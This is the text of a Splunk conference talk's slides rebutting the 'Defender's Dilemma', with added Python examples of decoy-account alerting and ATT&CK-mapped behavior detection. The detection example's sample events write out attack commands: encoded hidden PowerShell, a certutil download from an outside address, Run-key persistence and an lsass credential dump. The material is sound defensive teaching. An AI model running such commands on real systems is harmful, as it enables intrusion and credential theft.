Slide 1

© 2022 SPLUNK INC. Five Lies and a Truth Attacking the Defender’s Dilemma David J. Bianco Staff Security Strategist SURGe by Splunk [email protected] @DavidJBianco

Slide 2

About Me
He/Him
Staff Security Strategist, SURGe
SANS Certified Instructor
Security Researcher
● The Pyramid of Pain
● Threat Intelligence
● Threat Hunting


Slide 4

The Defender’s Dilemma
“Defenders have to get it right every time. Attackers only need to be right once.”
– Literally everyone in security at one time or another

Slide 5

The Defender’s Dilemma: Actively Harmful
Wrong Premise → Bad Decisions → Wasted Resources → Bad Security Outcomes → Demoralized Defenders

Slide 6

Lie #1: Defense & Offense are Separate
When you detect an adversary’s use of a particular indicator and respond to it quickly, you force them to expend effort to replace it. The higher the indicator sits on the Pyramid of Pain (hash values, IP addresses, domain names, network/host artifacts, tools, TTPs), the more that replacement costs them. By imposing cost, you turn a defensive program into an offensive one!
https://bit.ly/PyramidOfPain

Slide 7

Lie #2: Defenders Must be on Duty 24/7
Kind of true… BUT! Automation and SOAR can mitigate the worst of this asymmetry.
What is each side doing between attacks?
● Attackers plan their next operation
● Defenders learn skills and improve defenses

Slide 8

Lie #3: Defenders Have to Play Fair
There’s no such thing as cheating for the Blue Team! Attackers have needs, goals and habits. Take advantage of them.
Deception technology makes it quite easy to lie and cheat at scale.
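One cheap way to cheat at scale, as an added example that is not code from the talk or from Splunk: decoy accounts that exist in the directory but that no person or job ever uses, plus a sweep of the authentication log for any attempt against them. The account names, the log format and the log lines below are constructed for the example; the technique is that an attacker enumerating or spraying accounts cannot tell a decoy from a real one, while a defender knows that any touch of a decoy is hostile.

```python
"""Decoy (honey) accounts as a high-fidelity tripwire.

Added example for this page, not code from the talk or from Splunk.
Account names, the auth-log format and every log line are constructed.
"""
import re
from collections import defaultdict

# Hypothetical decoy accounts. They are provisioned in the directory so an
# attacker who lists users finds them, but nothing legitimate ever logs in
# with them and they must not carry real privileges.
DECOYS = {"svc-backup2", "dbadmin-legacy", "it-helpdesk-adm"}

# Constructed auth-log format: timestamp, result, user, source address.
AUTH_LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample log. A real user mistypes a password once (harmless);
# a second host walks a list of account names and hits three decoys.
SAMPLE_LOG = """\
2022-06-01T08:02:11Z auth ok user=alice src=10.0.1.15
2022-06-01T08:03:40Z auth fail user=alice src=10.0.1.15
2022-06-01T08:03:52Z auth ok user=alice src=10.0.1.15
2022-06-01T09:14:02Z auth fail user=administrator src=10.0.7.201
2022-06-01T09:14:03Z auth fail user=svc-backup2 src=10.0.7.201
2022-06-01T09:14:03Z auth fail user=dbadmin-legacy src=10.0.7.201
2022-06-01T09:14:05Z auth ok user=it-helpdesk-adm src=10.0.7.201
2022-06-01T10:30:00Z auth ok user=bob src=10.0.1.22
"""


def parse_line(line):
    """Return the fields of one log line, or None for lines that do not parse."""
    m = AUTH_LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decoy_hits(log_text, decoys=DECOYS):
    """Every authentication attempt against a decoy, successful or not.

    A failed attempt is still an alert: nobody legitimate should even know
    the decoy's name, so there is no benign explanation for guessing it.
    """
    return [ev for ev in map(parse_line, log_text.splitlines())
            if ev and ev["user"] in decoys]


def suspects(log_text, decoys=DECOYS):
    """Source addresses that touched a decoy, with the decoys each touched.

    Aggregating by source turns a pile of log lines into one alert that
    names the host to isolate, which is what a responder actually needs.
    """
    by_src = defaultdict(set)
    for ev in decoy_hits(log_text, decoys):
        by_src[ev["src"]].add(ev["user"])
    return {src: sorted(users) for src, users in by_src.items()}


if __name__ == "__main__":
    for src, users in suspects(SAMPLE_LOG).items():
        print(f"ALERT: {src} touched decoy accounts {', '.join(users)}")
```

Two caveats a practitioner will want. Keep the decoy names out of documentation, password managers and SSO account pickers, or real users will trip them and the alert loses its fidelity. And a decoy that accepts a login (the `ok` line above) should lead nowhere: a deliberately weak password is a fine lure, but the account must have no rights worth having.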

Slide 9

Lie #4: You Can’t Defend Against 0-Days
An exploit is only a foothold. What comes after is the important bit.
Look for exploits, but concentrate on behaviors! MITRE ATT&CK is a great start for cataloging behaviors.

Slide 10

Lie #5: Defenders Have to Get it Right Every Time
Attacks are not single events. Attack lifecycle models imply structure and time. You have a lot of chances to detect the attack over its entire lifetime. Attackers have to evade your detection at every phase!
(Figure: Lockheed Martin Cyber Kill Chain)
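To make slides 9 and 10 concrete, an added example that is not code from the talk or from Splunk: a handful of behavior rules, each tagged with a MITRE ATT&CK technique and a Cyber Kill Chain phase, run over constructed process-creation events in which the initial exploit is deliberately unknown and matches nothing. The rule names, the event format and the events are assumptions made for the example; the technique IDs and the phase names are the public ones. The last function carries slide 10's point as arithmetic: if each phase independently catches the attacker with some probability, the chance of evading all of them is the product of the misses.

```python
"""Behavior-first detection across the attack lifecycle.

Added example for this page, not code from the talk or from Splunk.
Events are constructed, rule names are hypothetical; ATT&CK technique IDs
and Cyber Kill Chain phase names are the real public ones.
"""
from dataclasses import dataclass
from functools import reduce
from typing import Callable

# Cyber Kill Chain phases in order (Lockheed Martin).
PHASES = ["Reconnaissance", "Weaponization", "Delivery", "Exploitation",
          "Installation", "Command and Control", "Actions on Objectives"]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Rule:
    name: str                          # hypothetical rule name
    technique: str                     # MITRE ATT&CK technique ID
    phase: str                         # Cyber Kill Chain phase of the behavior
    match: Callable[[dict], bool]      # predicate over one event


def _lc(event, key):
    """Case-insensitive field access; missing fields read as empty."""
    return event.get(key, "").lower()


# None of these rules knows which bug got the attacker in. They describe what
# attackers do once they are in, which a new exploit does not change.
RULES = [
    Rule("office_spawns_shell", "T1204.002", "Exploitation",
         lambda e: _lc(e, "parent") in OFFICE_APPS and _lc(e, "image") in SHELLS),
    Rule("encoded_powershell", "T1059.001", "Exploitation",
         lambda e: _lc(e, "image") == "powershell.exe"
         and any(f in _lc(e, "cmdline").split() for f in ("-enc", "-encodedcommand", "-e"))),
    Rule("certutil_download", "T1105", "Command and Control",
         lambda e: _lc(e, "image") == "certutil.exe" and "-urlcache" in _lc(e, "cmdline")),
    Rule("run_key_persistence", "T1547.001", "Installation",
         lambda e: _lc(e, "image") == "reg.exe" and "currentversion\\run" in _lc(e, "cmdline")),
    Rule("lsass_dump", "T1003.001", "Actions on Objectives",
         lambda e: "lsass" in _lc(e, "cmdline") and _lc(e, "image") in {"procdump.exe", "rundll32.exe"}),
]

# Constructed process-creation events, not real telemetry. The exploit itself
# (a document abusing an unknown Word bug) never appears: the first thing the
# sensor sees is the behavior that follows it.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://intranet.example"},                       # benign
    {"host": "ws01", "parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"host": "ws01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"host": "ws01", "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.10/a.dat a.dat"},
    {"host": "ws01", "parent": "powershell.exe", "image": "reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d C:\\Users\\Public\\a.exe"},
    {"host": "ws01", "parent": "cmd.exe", "image": "procdump.exe",
     "cmdline": "procdump -ma lsass.exe out.dmp"},
]


def evaluate(events, rules=RULES):
    """Run every rule over every event; one alert per (event, rule) hit."""
    return [{"host": e["host"], "rule": r.name, "technique": r.technique, "phase": r.phase}
            for e in events for r in rules if r.match(e)]


def phases_detected(alerts):
    """Kill chain phases at which at least one behavior was caught, in chain order."""
    return sorted({a["phase"] for a in alerts}, key=PHASES.index)


def evasion_probability(detect_rates):
    """Chance the attacker slips past every phase when phase i is independently
    detected with probability detect_rates[i]. One catch anywhere is enough."""
    return reduce(lambda acc, p: acc * (1.0 - p), detect_rates, 1.0)


if __name__ == "__main__":
    alerts = evaluate(SAMPLE_EVENTS)
    for a in alerts:
        print(f"{a['host']}: {a['rule']} ({a['technique']}) at phase {a['phase']}")
    print("phases covered:", phases_detected(alerts))
    print(f"evasion chance, 30% per phase over 7 phases: {evasion_probability([0.3] * 7):.3f}")
```

The benign browser launch produces no alert, and the unknown exploit produces no alert either; the four later phases do, so the attacker had to get past all of them and did not. With a 30% catch rate at each of seven phases the chance of running the whole chain undetected is 0.7^7, roughly 8%. The independence assumption is optimistic, since one evasion trick can defeat several rules at once, so use the number to reason about where coverage is thin rather than as a measurement.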

Slide 11

The Truth: The Attacker’s Dilemma
“Attackers have to get it right through their entire attack. Defenders only need to detect them once.”

Slide 12

The Attacker’s Dilemma is Beneficial
Correct Premise → Good Decisions → Efficient Use of Resources → Better Security Outcomes → Energized, Empowered Defenders

Slide 13

The Defender’s Dilemma Sits on a Throne of Lies
● Defense & Offense are Separate
● Defenders Must be on Duty 24/7
● Defenders Have to Play Fair
● You Can’t Defend Against 0-Days
● Defenders Have to Get it Right Every Time
